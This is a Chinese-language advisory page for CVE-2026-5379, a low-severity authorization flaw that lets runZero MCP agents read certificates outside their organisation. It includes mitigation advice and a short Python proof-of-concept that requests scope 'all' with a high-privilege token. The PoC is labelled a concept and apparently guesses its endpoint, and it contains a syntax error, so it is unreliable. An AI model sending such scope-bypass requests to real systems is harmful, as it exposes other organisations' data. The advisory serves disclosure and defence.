IPBUF安全漏洞报告
English
CVE-2026-5379 CVSS 3.0 低危

CVE-2026-5379 runZero平台权限不当导致信息泄露漏洞

披露日期: 2026-04-07
来源: 44488dab-36db-4358-99f9-bc116477f914

漏洞信息

漏洞编号
CVE-2026-5379
漏洞类型
权限不当
CVSS评分
3.0 低危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
runZero Platform

相关标签

权限不当信息泄露runZeroCWE-863MCP

漏洞概述

runZero Platform存在一个权限不当漏洞(CWE-863),允许MCP代理在未经授权的情况下访问组织范围之外的证书信息。该漏洞CVSS v3.1评分为3.0,被归类为低危风险。攻击者需要具备高权限且利用复杂度较高。官方已在4.0.260203.0版本中修复此问题,建议受影响用户尽快升级。

技术细节

该漏洞的核心在于runZero Platform对MCP(Model Context Protocol)代理的授权机制存在缺陷(CWE-863)。系统未正确验证代理请求的资源是否属于其授权的组织范围。尽管利用该漏洞需要攻击者已拥有高权限账户(PR:H)且攻击复杂度较高(AC:H),但成功利用后,攻击者可通过网络(AV:N)发起攻击,无需用户交互(UI:N),从而突破隔离边界(S:C),获取非本组织的证书信息。由于CVSS向量中机密性影响为低(C:L),泄露的信息量有限,不会影响数据的完整性和可用性。

攻击链分析

STEP 1
1. Reconnaissance
攻击者探测并确定目标为runZero Platform,并寻找拥有高权限的账户。
STEP 2
2. Initial Access
获取高权限账户的凭证或Token(满足PR:H要求)。
STEP 3
3. Exploitation
利用MCP代理接口,发送特制的请求以绕过组织范围限制,访问外部证书信息。
STEP 4
4. Data Exfiltration
读取并导出获取到的敏感证书数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# CVE-2026-5379 PoC Concept (RunZero MCP Agent Cert Info Leak) # This script demonstrates how an authenticated MCP agent might access # certificate information outside its authorized scope. import requests def exploit(target_url, auth_token): headers = { "Authorization": f"Bearer {auth_token}", "Content-Type": "application/json" } # Simulate a request intended to list certificates within the agent's scope # By manipulating the 'scope_id' or bypassing scope checks, we access other orgs' certs. payload = { "query": "list_certificates", "scope": "all" # Malicious parameter to bypass org restriction } try: response = requests.post(f"{target_url}/api/v1/mcp/execute", json=payload, headers=headers, verify=False) if response.status_code == 200: print("[+] Successfully accessed certificate information:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e} # Usage # exploit("https://target-runzero-instance.com", "HIGH_PRIVILEGE_TOKEN")

影响范围

runZero Platform < 4.0.260203.0

防御指南

临时缓解措施
如果无法立即升级,建议暂时禁用MCP代理功能或严格限制其网络访问权限,确保仅来自受信任IP的请求可以访问敏感API接口,并加强对高权限账户的审计。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表